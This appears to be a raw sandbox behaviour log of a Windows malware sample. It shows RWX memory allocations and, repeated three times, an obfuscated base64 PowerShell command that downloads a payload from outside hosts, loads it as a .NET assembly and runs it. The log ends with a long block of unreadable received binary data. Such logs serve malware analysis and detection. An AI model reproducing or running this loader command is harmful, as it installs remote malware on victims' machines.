NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
cmdline powershell -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received „
Data received 
Data received 
Data received 0
Data received XÁÃ…~ªã'-ï òúY* yý_\E¶,‹hM{íâWLu:?†Lõ©¨a
Data received 
Data received éòy)„•Á–—MÅÙ=¬U°5yÔd'äK‡q)$ô{
Data received Ð
Data received Vþì1uwÈP!vO‡©Á¦´rs™TzY>^ŽZ&4÷ôùp™z\¸™}…X¬ù|Ö§ïvÅJ¨×˜®6ì{þ4>L¢º\†<õQcBHݓ#ü\씶T$ /$Òt°ÂXàÑ&(Û‡-gÛy–m¼±uGEiZpÿnò“¥'QMêWJ®G^ªµÀâF‚…&ÿRc(¸ÔC³G\üѾ"ÚI÷r`F÷ç¼—õW7Z±šÐ¨²ÅІt2 tß÷–WëqŸùZæm°¥:AèÄ2„Ð&k³LAyö¡°e1?¿"阠ˆtl˜a¢]t°>šº!T¥ìÀÅqTû25]'ZèÍ~¥Œ¯Ò“™eí±‘·X+yŸóþêG´ìç‘5Üq›ª 6”c0Vk|çÆîšãR{öÊ<̊3ðŸ“O\ïœNÜîý ªÉlRʬÀ7厕禾y2æ!‰¤þ¦Ê)”Ù—k|ûšéßÙHM"ª¶k³å?å¤©idjè$‹¤ñ›#‹ÿ!zž­+Ÿ¹Œ; š(dúCò暾$~àtª¸ZWzÊy Ù¢ ÉžÐ*Š<›ªœ‚£ø ï=ž78q_ùEy~J;ÇۜG¥Üft^V…¦}Ù óùh2¯2H&ØÇ6¼ÙîO)·ññÓÏWu{êIÌ>hµ'¨ôR´£îL¬ÕPu©Þjy /ËHŽ^æ!qéY (TÚÆdäðuºÜpABC'«f°îëp4PŸ<'iôg•/ÑŒAÇ/<¯ÉXˆ(Qû…YFHƔõ/k1Ì,ÞUô@ˆ˜4(xBeg츚LŒŽŽzF¬Í_Ÿ ‰ †³7Ñ%€´w· ¾ ˆPºyÂÈ@¿Bhì¼mixq'™þ±Ígæp‚@x)ʤ¨ɛŒ¤F[G;XBe&)2ð{ˆAV0 [§d¾ûœgÒÑX*=é?AM*´e0/ä ™RÕ{3]΢Skïõ¢.ÿz} >+4[‰Ì€#Nõ°µÅamU±(BBÄ@¢#ì?Ó.$EJ[Ù Ç §Tzf_ï[Ù1Š®ñ{¦Š¾¤ë9L8FÎB°q™´}L…yÄ'ÓF¹UÈ6mkVnKÏó²¹OéE£Ûɰf¨Ê2ꥮ7 :«êmr5˼"³K;¨ÃcÇkúA£³å½(Í «-­È Ê ëàùTÕrfïDU´NS˜4@ LÏ%«.jOá‹o½¼¥ñT¿7'C´.gµg¢ùdŒ–œŠð¤S달:qŧ{.<à@SG’«#VNú›†ÓÉ£ÛùB ’ÖņsÒx¢Èhû±µ—øÐÿo[„óÙۆ¡a_;>!2dcÆkì^&]\¸Ó:}+‡#ϟ63¦E1P1ƒ<K¬Ÿ¤¥â>¦`²`Wœ„9Ê÷›P!¦ØwDžž^áåáÊ÷:î~í_&ÏZœ„É ©UvUo&½Ò+«ÔB°»¬ZÍLAßö…«òjìL—² #šÏ/vˆºÃp4&’. g=TVàf.Kv›ýB¸­쐌z[܀u~*ÖÍPjfÃNLd!Vjƒ!ÍóáÀxL^­¸t×S\ϰžÇŸSšcf4ÁñÈ NéL˜U @­0B*v ˆ1äl®æˆwðïí‰sÑæ2‹i¤g8áX ø¥‰¼\h–DQ³ÕV°Ê£«L7Z‘È#hÊ%^oW?Emßð->lA_½³sê+#_'ši~§¹æâ£Å€BÓ¦HþêèfҌXà×uµÔgdÀ?íig[é«$àGøÍ¤Mr¬‡A¿. ‚FhÙÏ~ ¥Õ+ÞÕ²q ¥ ’Kű[\ÿ–»HyÀˆ[( ÁòJ…K@jÚ`¼cB˜Lé+ݯµ'a7¢na•»n͏Z»¢Ó½(£®ûùØiƒÔòjc⌭¯³?ùR“ÇÁ¯O5Hm®S…®Âp´wÈPìµò¨6‘ wFg‘eF2ؐjÜ» Çm»-þ¢¼HB³­è‰{£^b—Hɂ¥1„0̆€„['o¥#¥OFɐ¶7åPJÁ:Ü Ø}YX¡?iž|PÄk&CÍA/| pF„<]ÈÐôöE°Eo«ƒ '3¢ƒ—ÛWá¶õ¹x?„—±¹ïB´9p Áyaô?S¥s59̙ñ• ›±™ ƒ«4ݛu‹žo—’ù´3Dڑ[éÜ&‚‡>nÀBªî”*î:¹û¥øe-ôùúwŠkXLñ,‘Ë›M>· ^ž*"£Ž3âËÒ2݆v+ço`7R@»Júß-‹ 6bõ!†W-޼¼ßÒ ÷Œ4IG£µ|ÜEU¦44N jûÌ+j WÛç,ƒ»é ¨æªpÒÕúש,†‘Ôò±BÑ9L¹ìÂAH0ç~í„o¬ò˜ÜŒa²¨µV-6üê%š‘æ^P10¥<;5M¡HHåíâç¼¢ÈÊôÛH÷§ðþ°1ͼ‡zÛð¿~_Dk„VIëézKa,à²WWWµ&:±F¸(šE:¢šoDÕ­¹ðE6Oaj]SHàȄJy%‰XžN{¢S‰U;=¿DÀ]¤²v=6ÝüI+4¢®àZùBMh.cÑ/·Â}è³ðR"vÜ&Q<Å`´âNÞGWÄÞ/ãUóÿޟaå"ÕÊT«:.–´³Øad& ·zPøÚЃ£9a‘¨°›àÝȸÐv~‡üÎø|Nmª® *úñØîj8e3X4™µÏrq*ršýØ] $ŚÞè‘ÒB ¶¿妠K~0 ÄÝcÛ£î¶\œÑE\K>œÂþÄOœ)”Cv…&¦®ø-Â,3»Àl”íù|´q¹Ö'º_4`+¼“.LÆêÈ`ÍÑaï­MG+”“^u†Gì7(ÿ RÌK\rA†‰4¶»Øùî aZÒ7'9j™,ÉBÖGjd¨(ÑG¢Dy(.f™£X,‚÷x|<ȶU†a”ìÖ{2!§WeˆÂ<ǁ’OæãÂ$°ÕÉz›1yYi4Iå2j^[*UDD[6S‹üÖµþ঱#û(ÓN/f 7B32ݖ"‰&½4¾ÚÎ6_ÎD~±XȝmHq‹†¼Ã™ Õýr†˜€C‹²JIë£Aºp7¼õYt… ‡¢Ê ԍ—üâû¯ ÷Âb?EÞ;.±C’úÜò(×ÁjÒÇmiÂq2ÃÊ&iÂåø@Æ{AöNü ŒûŸ¨íø=¹+ßL[·›ô~(&ºÊй'¿úï薊qô©6©âPðÈöWp~øGª¼'ɖpê<ªRÕQ£ÍÈg7ÂWϱ%é­ÑCQ¹ÎS©Z2ižDÌs¤Èã´až‚† ]>(zô¼ ¼ËU‹æ{¢é(ˆ”9ïü»ôïJ{Fò B`r…¨~\fÀ¿FUHc ñ‡½²„\$6Ô®Ÿ ; ©)™"óöœÈz#£ÜàÞ¸¦!±þñŒûgªì¡MùÔs¦ 5 y(à@cP‰`59¥RŠUܧ'—@”3ÂiR-‹–‘²xâxIh½à²™o‘ ¿“Z¢ܹ ç™Ö됇ñ0’J49Hˆ\¼…ÆZ3 èîȗf%ᅩS½ãç Q(Çï/>FôªM:üØÑhMP¼Y*óGù ~Oú•?OÊ# —_ ‹,@f"ÐPÙ0+ùÎhD)Ї WÃVmKsØñ?B@ÓLzßÔ²wo é·Báe3ˆVká ²BɆ\ßqʉ€ßÃîìÑ{S:ÑH@ ]‰ámދb½6®*Ø¿Dšÿ›•¢O?Ü`Ÿ+Ï(Ô2.à\?Â.^z1†—ì“ï MÁ\]F]5 “µÝX‡›À½³Öa·a‡ë}[¶æ |‡SĊn÷ EêSü7ëµ.¸4»RTáJM[nó(B¦^/’.v'±ÌIhÍÓ¶£eØÞêí¤pAéÒ]¡@']#S ƒÏõÙæºÕp`œËÏÅe`Äe èfdˆQ»Ën´·<$h ¶wG˜š8Ï cØ\}û^ÇaW£Uœ2ù›³ƒ½á †È&LwJq²ßÂt uʙW€ºØ¹”R{Ín¤)m>%/vâà½^ò°,çs7ڂö7@æ1ê€{ôn¼7£‡9®y<ù;\d0ïkÿE}ºïàè(O9äÃ{ðI´)hFûN8 –æ<¾¹/»½M&¨¾hw,2?8¹êْê{³‘»8Õg7ŠFh¨ŽØ£^ÿfÑ<ê8õáõRf¼Š“»±«“ÿ(xÿg"B‰Í¶¨æ `-ûûvb½ç%̶3Ñîܞ®¢ºÌ»:`ø|ì_±¤Ëd5¿9òÑÒ‹ZA¬¹|2hq¯‹+û-ɞ¢ãj0¼®ø4yD†¬â³qB‚dʗݫ ðŽRÈ\@Óü|é§>Î@w彑áZOYïBgµÏ‡aŽÈ—3Tå$8Ž×„/¬òÿз¥Ãã­G 